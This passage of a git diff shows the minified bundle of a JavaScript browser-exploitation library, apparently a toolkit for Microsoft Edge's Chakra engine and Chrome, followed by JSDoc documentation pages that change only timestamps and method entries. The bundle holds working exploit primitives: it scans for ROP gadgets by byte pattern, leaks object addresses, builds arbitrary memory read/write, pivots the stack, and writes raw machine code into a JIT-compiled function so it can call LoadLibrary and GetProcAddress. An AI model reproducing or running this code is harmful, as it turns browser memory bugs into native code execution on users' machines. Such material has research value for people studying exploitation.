this.comp(t)<=0},E.lte=E.lessThanOrEqual,E.greaterThan=function(t){return this.comp(t)>0},E.gt=E.greaterThan,E.greaterThanOrEqual=function(t){return this.comp(t)>=0},E.gte=E.greaterThanOrEqual,E.compare=function(t){if(i(t)||(t=d(t)),this.eq(t))return 0;var r=this.isNegative(),e=t.isNegative();return r&&!e?-1:!r&&e?1:this.unsigned?t.high>>>0>this.high>>>0||t.high===this.high&&t.low>>>0>this.low>>>0?-1:1:this.sub(t).isNegative()?-1:1},E.comp=E.compare,E.negate=function(){return!this.unsigned&&this.eq(P)?P:this.not().add(_)},E.neg=E.negate,E.add=function(t){i(t)||(t=d(t));var r=this.high>>>16,e=65535&this.high,n=this.low>>>16,s=65535&this.low,o=t.high>>>16,h=65535&t.high,u=t.low>>>16,c=0,g=0,l=0,f=0;return l+=(f+=s+(65535&t.low))>>>16,g+=(l+=n+u)>>>16,c+=(g+=e+h)>>>16,c+=r+o,a((l&=65535)<<16|(f&=65535),(c&=65535)<<16|(g&=65535),this.unsigned,this.size)},E.subtract=function(t){return i(t)||(t=d(t)),this.add(t.neg())},E.sub=E.subtract,E.multiply=function(t){if(this.isZero())return f;if(i(t)||(t=d(t)),t.isZero())return f;if(this.eq(P))return t.isOdd()?P:f;if(t.eq(P))return this.isOdd()?P:f;if(this.isNegative())return t.isNegative()?this.neg().mul(t.neg()):this.neg().mul(t).neg();if(t.isNegative())return this.mul(t.neg()).neg();if(this.lt(l)&&t.lt(l))return s(this.toNumber()*t.toNumber(),this.unsigned);var r=this.high>>>16,e=65535&this.high,n=this.low>>>16,o=65535&this.low,h=t.high>>>16,u=65535&t.high,c=t.low>>>16,g=65535&t.low,p=0,_=0,y=0,v=0;return y+=(v+=o*g)>>>16,_+=(y+=n*g)>>>16,y&=65535,_+=(y+=o*c)>>>16,p+=(_+=e*g)>>>16,_&=65535,p+=(_+=n*c)>>>16,_&=65535,p+=(_+=o*u)>>>16,p+=r*g+e*c+n*u+o*h,a((y&=65535)<<16|(v&=65535),(p&=65535)<<16|(_&=65535),this.unsigned,this.size)},E.mul=E.multiply,E.divide=function(t){if(i(t)||(t=d(t)),t.isZero())throw Error("division by zero");if(this.isZero())return this.unsigned?p:f;var r,e,n;if(this.unsigned){if(t.unsigned||(t=t.toUnsigned()),t.gt(this))return p;if(t.gt(this.shru(1)))return y;n=p}else{if(this.eq(P))return 
t.eq(_)||t.eq(v)?P:t.eq(P)?_:(r=this.shr(1).div(t).shl(1)).eq(f)?t.isNegative()?_:v:(e=this.sub(t.mul(r)),n=r.add(e.div(t)));else if(t.eq(P))return this.unsigned?p:f;if(this.isNegative())return t.isNegative()?this.neg().div(t.neg()):this.neg().div(t).neg();if(t.isNegative())return this.div(t.neg()).neg();n=f}for(e=this;e.gte(t);){r=Math.max(1,Math.floor(e.toNumber()/t.toNumber()));for(var a=Math.ceil(Math.log(r)/Math.LN2),h=a<=48?1:o(2,a-48),u=s(r),c=u.mul(t);c.isNegative()||c.gt(e);)c=(u=s(r-=h,this.unsigned)).mul(t);u.isZero()&&(u=_),n=n.add(u),e=e.sub(c)}return n},E.div=E.divide,E.modulo=function(t){return i(t)||(t=d(t)),this.sub(this.div(t).mul(t))},E.mod=E.modulo,E.not=function(){return a(~this.low,~this.high,this.unsigned,this.size)},E.and=function(t){return i(t)||(t=d(t)),a(this.low&t.low,this.high&t.high,this.unsigned,this.size)},E.or=function(t){return i(t)||(t=d(t)),a(this.low|t.low,this.high|t.high,this.unsigned,this.size)},E.xor=function(t){return i(t)||(t=d(t)),a(this.low^t.low,this.high^t.high,this.unsigned,this.size)},E.shiftLeft=function(t){return i(t)&&(t=t.toInt()),0==(t&=63)?this:t<32?a(this.low<>>32-t,this.unsigned,this.size):a(0,this.low<>>t|this.high<<32-t,this.high>>t,this.unsigned,this.size):a(this.high>>t-32,this.high>=0?0:-1,this.unsigned,this.size)},E.shr=E.shiftRight,E.shiftRightUnsigned=function(t){if(i(t)&&(t=t.toInt()),0===(t&=63))return this;var r=this.high;return t<32?a(this.low>>>t|r<<32-t,r>>>t,this.unsigned,this.size):a(32===t?r:r>>>t-32,0,this.unsigned,this.size)},E.shru=E.shiftRightUnsigned,E.toSigned=function(){return this.unsigned?a(this.low,this.high,!1,this.size):this},E.toUnsigned=function(){return this.unsigned?this:a(this.low,this.high,!0,this.size)},E.toBytes=function(t){return t?this.toBytesLE():this.toBytesBE()},E.toBytesLE=function(){var t=this.high,i=this.low;return[255&i,i>>>8&255,i>>>16&255,i>>>24&255,255&t,t>>>8&255,t>>>16&255,t>>>24&255]},E.toBytesBE=function(){var 
t=this.high,i=this.low;return[t>>>24&255,t>>>16&255,t>>>8&255,255&t,i>>>24&255,i>>>16&255,i>>>8&255,255&i]},t}();i.a=e},function(t,i,r){"use strict";var e=r(0);function n(t){var i=t/8,r=t/8,n={},s=[],a=this;function o(t){for(var i=new Uint8Array(t.length+1),r=0;r>>0&255)!=a&&(h>>>8&255)!=a&&(h>>>16&255)!=a&&(h>>>24&255)!=a){o+=3;continue}}for(var d=0;d=0&&i[d]!=r[o+d]);d++);if(d==s)return r.add(o);o+=d}return null},n.prototype.findGadgets=function(t,i){for(var r=this.Uint8Ptr.cast(t),e=this.Uint32Ptr.cast(r.add(60))[0],n=this.Uint32Ptr.cast(t.add(e))[7],s=new Int32Array(n/4),a=r.address.add(4096),o=4096;o{for(var i=t[0],e=t[1],n=0;;){if((n=d.indexOf(e[0],n))<0)throw"missing gadget "+i;for(var s=1;s=0&&d[n+s]!=e[s]);s++);if(s==e.length)break;n++}u[i]=r.add(n)}),u},i.a=n},function(module,__webpack_exports__,__webpack_require__){"use strict";var __WEBPACK_IMPORTED_MODULE_0_baseexploit__=__webpack_require__(1),__WEBPACK_IMPORTED_MODULE_1_integer__=__webpack_require__(0);function ChakraExploit(){var t=this;__WEBPACK_IMPORTED_MODULE_0_baseexploit__.a.call(this,64),this.Thread=function(i){var r=new Worker(i);r.onmessage=(i=>{if("CHAKRA_EXPLOIT"==i.data){for(var r=t.globalListFirst.load()[t.threadContextStackLimit].sub(49152).add(1048576),e=t.Uint64Ptr.cast(r).add(-1);!new __WEBPACK_IMPORTED_MODULE_1_integer__.a(1094861636,65536).eq(e.load());)if((e=e.add(-1)).address<=r.sub(65536))throw"unable to find canary";var n=t.Uint64Ptr.cast(e[1]);t.Uint64Ptr.cast(e[2])[7]=n}else if(this.onmessage)return 
this.onmessage(i)}),this.onmessage=null,this.postMessage=r.postMessage.bind(r)}}ChakraExploit.prototype=Object.create(__WEBPACK_IMPORTED_MODULE_0_baseexploit__.a.prototype),ChakraExploit.prototype.constructor=ChakraExploit,ChakraExploit.prototype.initChakra=function(t){this.chakraBase=this.findModuleBase(t);if(this.gadgets=this.findGadgets(this.chakraBase,[["callLoadLibraryExW",[72,139,200,51,210,65,184,0,8,0,0,255,21]],["jmpGetProcAddress",[72,139,193,72,139,73,8,72,133,201,116,11,72,131,196,40,72,255,37]],["nopReturn",[195]],["popRaxReturn",[88,195]],["popRdxReturn",[90,195]],["popRspReturn",[92,195]],["popRbpReturn",[93,195]],["addRsp58Return",[72,131,196,88,195]],["storeRaxAtRdxReturn",[72,137,2,195]],["entrySlice",[139,248,65,131,-1,2]],["amd64CallFunction",[76,139,78,8,76,139,6,72,131,236,32,255]],["linkToBeginningThreadContext",[72,139,196,76,137,64,24,72,137,80,16,72,137,72,8,72,131,-1,-1,0]],["popRcxRdxR8R9Return",[72,139,76,36,8,72,139,84,36,16,76,139,68,36,24,76,139,76,36,32,72,255,224]],["addRsp28Return",[72,131,196,40,195]]]),this.amd64CallFunctionReturnOffset=208==this.gadgets.amd64CallFunction[12]?13:17,97==this.gadgets.linkToBeginningThreadContext[17])this.threadContextPrev=this.gadgets.linkToBeginningThreadContext[18]/8,this.threadContextNext=this.gadgets.linkToBeginningThreadContext[30]/8,this.globalListFirst=new this.PointerType(this.Uint64Ptr).cast(this.Uint64.cast(this.gadgets.linkToBeginningThreadContext).add(27).add(this.Int32Ptr.cast(this.gadgets.linkToBeginningThreadContext.add(23))[0]));else{if(161!=this.gadgets.linkToBeginningThreadContext[17])throw"unsupported version";this.threadContextPrev=this.gadgets.linkToBeginningThreadContext[18]/8,this.threadContextNext=this.gadgets.linkToBeginningThreadContext[33]/8,this.globalListFirst=new this.PointerType(this.Uint64Ptr).cast(this.Uint64.cast(this.gadgets.linkToBeginningThreadContext).add(30).add(this.Int32Ptr.cast(this.gadgets.linkToBeginningThreadContext.add(26))[0]))}for(var 
i=this.globalListFirst[0],r=0;49152!=(65535&i[r]);r++);this.threadContextStackLimit=r;i=this.gadgets.callLoadLibraryExW.add(17).add(this.Int32Ptr.cast(this.gadgets.callLoadLibraryExW.add(13)).load());this.LoadLibraryExW=new this.PointerType(this.Uint8Ptr).cast(i).load();i=this.gadgets.jmpGetProcAddress.add(23).add(this.Int32Ptr.cast(this.gadgets.jmpGetProcAddress.add(19)).load());if(this.GetProcAddress=new this.PointerType(this.Uint8Ptr).cast(i).load(),this.findStackTop(),this.locateArray=[{}],this.locateArrayPtr=new this.PointerType(this.Uint64Ptr).cast(this.addressOfSlow(this.locateArray))[5].add(3),!this.addressOfSlow(this.locateArray[0]).address.eq(this.locateArrayPtr[0]))throw"init of addressOf failed!"},ChakraExploit.prototype.addressOf=function(t){return this.locateArray[0]=t,this.locateArrayPtr[0]},ChakraExploit.prototype.addressOfArrayBuffer=function(t){var i=new DataView(t);return this.Uint64Ptr.cast(this.addressOf(i))[7]},ChakraExploit.prototype.findStackTop=function(){if(void 0===this.stackTop){if("undefined"!=typeof WorkerGlobalScope)var t=this.globalListFirst.load()[this.threadContextStackLimit],i=1048576;else t=this.globalListFirst.load()[this.threadContextStackLimit],i=10485760;var r=t.sub(49152).add(i);this.stackTop=r}},ChakraExploit.prototype.addressOfSlow=function(obj){var address;return eval("String.prototype.slice").call("",{valueOf:()=>{for(var t=this.gadgets,i=this.Uint64Ptr.cast(this.stackTop).add(-1);!this.Uint64.cast(t.entrySlice).eq(i.load());)if((i=i.add(-1)).address<=this.stackTop.sub(65536))throw"unable to find entrySlice";for(;!this.Uint64.cast(t.amd64CallFunction).add(this.amd64CallFunctionReturnOffset).eq(i.load());)if((i=i.add(1)).address>=this.stackTop)throw"unable to find amd64CallFunction";for(;!i[0].eq(new __WEBPACK_IMPORTED_MODULE_1_integer__.a(1111638594,65536))||!i[2].eq(new __WEBPACK_IMPORTED_MODULE_1_integer__.a(1094795585,65536));)if((i=i.add(1)).address>=this.stackTop)throw"unable to find 
canaries";address=this.Uint8Ptr.cast(i[1])}},0,0,0,obj,1111638594,obj,1094795585),address},ChakraExploit.prototype.customInt32Array=function(t){var i=new Int32Array(1),r=this.Uint64Ptr.cast(this.addressOf(i));return r[4]=2147483647,r[7]=t,i},ChakraExploit.prototype.call=function(address,...args){if(args.length>10)throw"too many arguments";var returnValAddr;return eval("String.prototype.slice").call("",{valueOf:()=>{for(var t=this.gadgets,i=this.Uint64.cast(t.amd64CallFunction).add(this.amd64CallFunctionReturnOffset),r=this.Uint64.cast(t.entrySlice),e=this.stackTop.sub(65536),n=this.customInt32Array(e),s=8184;s>=0&&(r.low!=n[2*s]||r.high!=n[2*s+1]);s-=1);if(0==s)throw"unable to find entrySlice";for(;i.low!=n[2*s]||i.high!=n[2*s+1];)if(8192==++s)throw"unable to find amd64CallFunction";var a=(n=this.Uint64Ptr.cast(e.add(8*s))).add(-2);n=n.add(-16384);var o=this.customInt32Array(n);for(s=32;s>=0;s--){o[4096*s/4]}function h(t,i,r){r=r.address?r.address:__WEBPACK_IMPORTED_MODULE_1_integer__.a.fromValue(r),t[2*i+0]=r.low,t[2*i+1]=r.high}h(o,s=4,t.popRaxReturn),h(o,++s,t.addRsp28Return),h(o,++s,t.popRcxRdxR8R9Return),s++,s++,void 0!==args[0]&&h(o,s,args[0]),s++,void 0!==args[1]&&h(o,s,args[1]),s++,void 0!==args[2]&&h(o,s,args[2]),s++,void 0!==args[3]&&h(o,s,args[3]),h(o,++s,t.nopReturn),h(o,++s,address),h(o,++s,t.addRsp58Return),s++,s+=4,void 0!==args[4]&&h(o,s,args[4]),s++,void 0!==args[5]&&h(o,s,args[5]),s++,void 0!==args[6]&&h(o,s,args[6]),s++,void 0!==args[7]&&h(o,s,args[7]),s++,void 0!==args[8]&&h(o,s,args[8]),s++,void 0!==args[9]&&h(o,s,args[9]),s++,void 0!==args[10]&&h(o,s,args[10]),h(o,++s,t.popRdxReturn),h(o,++s,n),h(o,++s,t.storeRaxAtRdxReturn),h(o,++s,t.popRaxReturn),h(o,++s,new __WEBPACK_IMPORTED_MODULE_1_integer__.a(0,262144)),h(o,++s,t.popRbpReturn),h(o,++s,a.load()),h(o,++s,t.popRspReturn),h(o,++s,a.add(2)),s++,a[0]=n,returnValAddr=n}}),returnValAddr[0]},__webpack_exports__.a=ChakraExploit},function(t,i,r){"use 
strict";Object.defineProperty(i,"__esModule",{value:!0});var e=r(1),n=r(2),s=r(4),a=r(5),o=r(0);r.d(i,"BaseExploit",function(){return e.a}),r.d(i,"ChakraExploit",function(){return n.a}),r.d(i,"ChakraThreadExploit",function(){return s.a}),r.d(i,"ChromeExploit",function(){return a.a}),r.d(i,"Integer",function(){return o.a})},function(module,__webpack_exports__,__webpack_require__){"use strict";var __WEBPACK_IMPORTED_MODULE_0_chakraexploit__=__webpack_require__(2),__WEBPACK_IMPORTED_MODULE_1_integer__=__webpack_require__(0);function ChakraThreadExploit(){__WEBPACK_IMPORTED_MODULE_0_chakraexploit__.a.call(this);var dvManager=new DataView(new ArrayBuffer(4096)),dvWorker=new DataView(new ArrayBuffer(4096));this.dvWorker=dvWorker,this.dvManager=dvManager,eval("String.prototype.slice").call("",{valueOf:function(){for(postMessage("CHAKRA_EXPLOIT");0==dvManager.getInt32(0););}},0,0,0,0,1094861636,dvWorker,dvManager,1094795585);var vtable=new __WEBPACK_IMPORTED_MODULE_1_integer__.a(dvManager.getInt32(0,!0),dvManager.getInt32(4,!0));this.vtable=vtable,this.chakraBase=this.findModuleBase(vtable),this.initChakra(vtable)}ChakraThreadExploit.prototype=Object.create(__WEBPACK_IMPORTED_MODULE_0_chakraexploit__.a.prototype),ChakraThreadExploit.prototype.constructor=ChakraThreadExploit,ChakraThreadExploit.prototype.read=function(t,i){switch(this.dvManager.setInt32(56,t.low,!0),this.dvManager.setInt32(60,t.high,!0),i){case 8:return new __WEBPACK_IMPORTED_MODULE_1_integer__.a(this.dvWorker.getInt8(0,!0),0,!0);case 16:return new __WEBPACK_IMPORTED_MODULE_1_integer__.a(this.dvWorker.getInt16(0,!0),0,!0);case 32:return new __WEBPACK_IMPORTED_MODULE_1_integer__.a(this.dvWorker.getInt32(0,!0),0,!0);case 64:return new __WEBPACK_IMPORTED_MODULE_1_integer__.a(this.dvWorker.getInt32(0,!0),this.dvWorker.getInt32(4,!0),!0)}},ChakraThreadExploit.prototype.write=function(t,i,r){switch(this.dvManager.setInt32(56,t.low,!0),this.dvManager.setInt32(60,t.high,!0),r){case 8:return 
this.dvWorker.setInt8(0,0|i.low,!0);case 16:return this.dvWorker.setInt16(0,0|i.low,!0);case 32:return this.dvWorker.setInt32(0,0|i.low,!0);case 64:this.dvWorker.setInt32(0,0|i.low,!0),this.dvWorker.setInt32(4,0|i.high,!0)}},__webpack_exports__.a=ChakraThreadExploit},function(t,i,r){"use strict";var e=r(1);r(0);function n(){e.a.call(this,64)}n.prototype=Object.create(e.a.prototype),n.prototype.constructor=n,n.prototype.initChrome=function(t){this.chromeBase=this.findModuleBase(t);for(var i="",r=0;r<1e3;r++)i+="x["+r+"] += "+Math.random()+";\n";this.jitFunction=new Function("x",i);var e=new Array(1e3).fill(0);for(r=0;r<1e4;r++)this.jitFunction(e);this.gadgets=this.findGadgets(this.chromeBase,[["loadLibraryGetProcAddress",[72,141,13,-1,-1,-1,-1,255,21,-1,-1,-1,-1,72,139,248,72,133,192,15,132,-1,-1,-1,-1,72,141,21,-1,-1,-1,-1,72,139,200,255,21,-1,-1,-1,-1]],["mainThreadStack",[72,139,5,-1,-1,-1,-1,72,141,76,36,-1,72,43,193,72,141,29,-1,-1,-1,-1,72,59,5,-1,-1,-1,-1]]]),this.mainThreadStackBase=new this.PointerType(this.Uint64Ptr).cast(this.Uint64.cast(this.gadgets.mainThreadStack).add(7).add(this.Int32Ptr.cast(this.gadgets.mainThreadStack.add(3))[0]))[0],this.LoadLibraryW=new this.PointerType(this.Uint64Ptr).cast(this.Uint64.cast(this.gadgets.loadLibraryGetProcAddress).add(13).add(this.Int32Ptr.cast(this.gadgets.loadLibraryGetProcAddress.add(9))[0]))[0],this.GetProcAddress=new this.PointerType(this.Uint64Ptr).cast(this.Uint64.cast(this.gadgets.loadLibraryGetProcAddress).add(41).add(this.Int32Ptr.cast(this.gadgets.loadLibraryGetProcAddress.add(37))[0]))[0]},n.prototype.addressOf=function(t){var i=[t];return this.Uint64Ptr.cast(this.Uint64Ptr.cast(this.addressOfSlow(i))[2].sub(1))[2].sub(1)},n.prototype.addressOfArrayBuffer=function(t){return this.Uint64Ptr.cast(this.addressOf(t))[4]},n.prototype.addressOfSlow=function(t){var i,r=this.mainThreadStackBase;return t.toString=function(){for(var 
t=0;t>-4096;t--)if(322507578==r[t-2].high&&322376504==r[t-1].high){i=r[t].sub(1);break}return""},String.prototype.indexOf.call(t,322376504,322507578),i},n.prototype.call=function(t,...i){var r=this;function e(t){return t.high<=32767&&1==(7&t.low)}function n(t,i){return t[0]=72,t[1]=131,t[2]=196,t[3]=i,t.add(4)}function s(t,i){return t[0]=72,t[1]=184,r.Uint64Ptr.cast(t.add(2))[0]=i,t.add(10)}function a(t,i){return t[0]=72,t[1]=185,r.Uint64Ptr.cast(t.add(2))[0]=i,t.add(10)}function o(t,i){return t[0]=72,t[1]=186,r.Uint64Ptr.cast(t.add(2))[0]=i,t.add(10)}function h(t,i){return t[0]=73,t[1]=184,r.Uint64Ptr.cast(t.add(2))[0]=i,t.add(10)}function d(t,i){return t[0]=73,t[1]=185,r.Uint64Ptr.cast(t.add(2))[0]=i,t.add(10)}function u(t){return t[0]=80,t.add(1)}var c=this.Uint64Ptr.cast(this.Uint64Ptr.cast(this.addressOf(this.jitFunction))[7].sub(1));if(e(c[0])&&e(c[1])&&e(c[2])&&e(c[3]))var g=this.Uint8Ptr.cast(c).add(96);else g=this.Uint8Ptr.cast(c);var l=this.Uint64Ptr.cast(g.add(512));i.length>4&&1&i.length&&i.push(0);var f=g;f=function(t){return t[0]=85,t[1]=72,t[2]=137,t[3]=229,t[4]=72,t[5]=131,t[6]=228,t[7]=240,t.add(8)}(f=function(t,i){return t[0]=233,r.Int32Ptr.cast(t.add(1))[0]=i,t.add(5)}(f,4096).add(4096));for(var p=i.length-1;p>=0;p--)f=0==p?a(f,i[p]):1==p?o(f,i[p]):2==p?h(f,i[p]):3==p?d(f,i[p]):u(f=s(f,i[p]));return f=function(t){return t[0]=201,t[1]=195,t.add(2)}(f=function(t,i){return t[0]=72,t[1]=163,r.Uint64Ptr.cast(t.add(2))[0]=i,t.add(10)}(f=n(f=function(t){return t[0]=255,t[1]=208,t.add(2)}(f=s(f=n(f,-32),t)),32),l)),this.jitFunction(),l[0]},i.a=n}]); \ No newline at end of file diff --git a/docs/BaseExploit.html b/docs/BaseExploit.html index 68c6323..93c2933 100644 --- a/docs/BaseExploit.html +++ b/docs/BaseExploit.html @@ -22,7 +22,7 @@
@@ -248,7 +248,7 @@

Int8Source:
@@ -317,7 +317,7 @@

Int8PtrSource:
@@ -386,7 +386,7 @@

Int16Source:
@@ -455,7 +455,7 @@

Int16PtrSource:
@@ -524,7 +524,7 @@

Int32Source:
@@ -593,7 +593,7 @@

Int32PtrSource:
@@ -662,7 +662,7 @@

Int64Source:
@@ -731,7 +731,7 @@

Int64PtrSource:
@@ -800,7 +800,7 @@

Uint8Source:
@@ -869,7 +869,7 @@

Uint8PtrSource:
@@ -938,7 +938,7 @@

Uint16Source:
@@ -1007,7 +1007,7 @@

Uint16PtrSource:
@@ -1076,7 +1076,7 @@

Uint32Source:
@@ -1145,7 +1145,7 @@

Uint32PtrSource:
@@ -1214,7 +1214,7 @@

Uint64Source:
@@ -1283,7 +1283,7 @@

Uint64PtrSource:
@@ -1362,7 +1362,7 @@

findGadget<
Source:
@@ -1539,7 +1539,7 @@

findGadget
Source:
@@ -1716,7 +1716,7 @@

findMod
Source:
@@ -1867,7 +1867,7 @@

importF
Source:
@@ -2065,7 +2065,7 @@

Returns:

- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/BaseExploit_ArrayType.html b/docs/BaseExploit_ArrayType.html index a4cac80..9b100fe 100644 --- a/docs/BaseExploit_ArrayType.html +++ b/docs/BaseExploit_ArrayType.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new ArrayTyp
Source:
@@ -249,7 +249,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/BaseExploit_CString.html b/docs/BaseExploit_CString.html index a12802f..90054a8 100644 --- a/docs/BaseExploit_CString.html +++ b/docs/BaseExploit_CString.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new CStringSource:
@@ -226,7 +226,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/BaseExploit_FunctionType.html b/docs/BaseExploit_FunctionType.html index 2c5555e..22f884d 100644 --- a/docs/BaseExploit_FunctionType.html +++ b/docs/BaseExploit_FunctionType.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new Funct
Source:
@@ -229,7 +229,7 @@

castSource:
@@ -384,7 +384,7 @@
Returns:

- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/BaseExploit_IntType.html b/docs/BaseExploit_IntType.html index 0b98e27..484b127 100644 --- a/docs/BaseExploit_IntType.html +++ b/docs/BaseExploit_IntType.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new IntTypeSource:
@@ -249,7 +249,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/BaseExploit_Pointer.html b/docs/BaseExploit_Pointer.html index 0110571..a6364ff 100644 --- a/docs/BaseExploit_Pointer.html +++ b/docs/BaseExploit_Pointer.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new PointerSource:
@@ -241,7 +241,7 @@

addSource:
@@ -395,7 +395,7 @@

isNullSource:
@@ -497,7 +497,7 @@

loadSource:
@@ -602,7 +602,7 @@

storeSource:
@@ -738,7 +738,7 @@

toStringSource:
@@ -841,7 +841,7 @@
Returns:

- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/BaseExploit_PointerType.html b/docs/BaseExploit_PointerType.html index 2642653..01f2387 100644 --- a/docs/BaseExploit_PointerType.html +++ b/docs/BaseExploit_PointerType.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new Pointe
Source:
@@ -229,7 +229,7 @@

castSource:
@@ -384,7 +384,7 @@
Returns:

- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/BaseExploit_StructPointer.html b/docs/BaseExploit_StructPointer.html index d7c8e28..7d76a02 100644 --- a/docs/BaseExploit_StructPointer.html +++ b/docs/BaseExploit_StructPointer.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new Stru
Source:
@@ -238,7 +238,7 @@

Parameters:

- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/BaseExploit_StructType.html b/docs/BaseExploit_StructType.html index e6ea009..61bb10b 100644 --- a/docs/BaseExploit_StructType.html +++ b/docs/BaseExploit_StructType.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new StructT
Source:
@@ -269,7 +269,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/BaseExploit_Type.html b/docs/BaseExploit_Type.html index 3e9367a..5cbafcc 100644 --- a/docs/BaseExploit_Type.html +++ b/docs/BaseExploit_Type.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new TypeSource:
@@ -163,7 +163,7 @@

PtrSource:
@@ -233,7 +233,7 @@

Ptr
- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/BaseExploit_WString.html b/docs/BaseExploit_WString.html index 69ab436..06f5c45 100644 --- a/docs/BaseExploit_WString.html +++ b/docs/BaseExploit_WString.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new WStringSource:
@@ -226,7 +226,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraExploit.html b/docs/ChakraExploit.html index 2df6abc..ff3fa29 100644 --- a/docs/ChakraExploit.html +++ b/docs/ChakraExploit.html @@ -22,7 +22,7 @@
@@ -209,7 +209,7 @@

Int8Source:
@@ -283,7 +283,7 @@

Int8PtrSource:
@@ -357,7 +357,7 @@

Int16Source:
@@ -431,7 +431,7 @@

Int16PtrSource:
@@ -505,7 +505,7 @@

Int32Source:
@@ -579,7 +579,7 @@

Int32PtrSource:
@@ -653,7 +653,7 @@

Int64Source:
@@ -727,7 +727,7 @@

Int64PtrSource:
@@ -801,7 +801,7 @@

Uint8Source:
@@ -875,7 +875,7 @@

Uint8PtrSource:
@@ -949,7 +949,7 @@

Uint16Source:
@@ -1023,7 +1023,7 @@

Uint16PtrSource:
@@ -1097,7 +1097,7 @@

Uint32Source:
@@ -1171,7 +1171,7 @@

Uint32PtrSource:
@@ -1245,7 +1245,7 @@

Uint64Source:
@@ -1319,7 +1319,7 @@

Uint64PtrSource:
@@ -1403,7 +1403,7 @@

addressOfSource:
@@ -1542,7 +1542,7 @@
Returns:
-

addressOfSlow(obj) → {Pointer}

+

addressOfArrayBuffer(ab) → {Pointer}

@@ -1554,7 +1554,7 @@

addressO
Source:
@@ -1594,7 +1594,7 @@

addressO
- Returns the address of a Javascript object. Internal. + Returns the address of ArrayBuffer contents.
@@ -1632,13 +1632,13 @@

Parameters:
- obj + ab -* +ArrayBuffer @@ -1648,7 +1648,7 @@
Parameters:
- Any Javascript object + ArrayBuffer @@ -1693,7 +1693,7 @@
Returns:
-

addressOfString(s) → {Pointer}

+

addressOfSlow(obj) → {Pointer}

@@ -1705,7 +1705,7 @@

addres
Source:
@@ -1745,7 +1745,7 @@

addres
- Returns the address of a string. Points to the string's bytes. + Returns the address of a Javascript object. Internal.
@@ -1783,13 +1783,13 @@

Parameters:
- s + obj -string +* @@ -1799,7 +1799,7 @@
Parameters:
- A Javascript string + Any Javascript object @@ -1856,7 +1856,7 @@

callSource:
@@ -2050,7 +2050,7 @@

findGadget<
Source:
@@ -2232,7 +2232,7 @@

findGadget
Source:
@@ -2414,7 +2414,7 @@

findMod
Source:
@@ -2570,7 +2570,7 @@

importF
Source:
@@ -2909,7 +2909,7 @@

Parameters:

- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/ChakraExploit_ArrayType.html b/docs/ChakraExploit_ArrayType.html index 95f1b27..b0765c2 100644 --- a/docs/ChakraExploit_ArrayType.html +++ b/docs/ChakraExploit_ArrayType.html @@ -22,7 +22,7 @@
@@ -67,7 +67,7 @@

new ArrayTyp
Source:
@@ -254,7 +254,7 @@

Extends


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
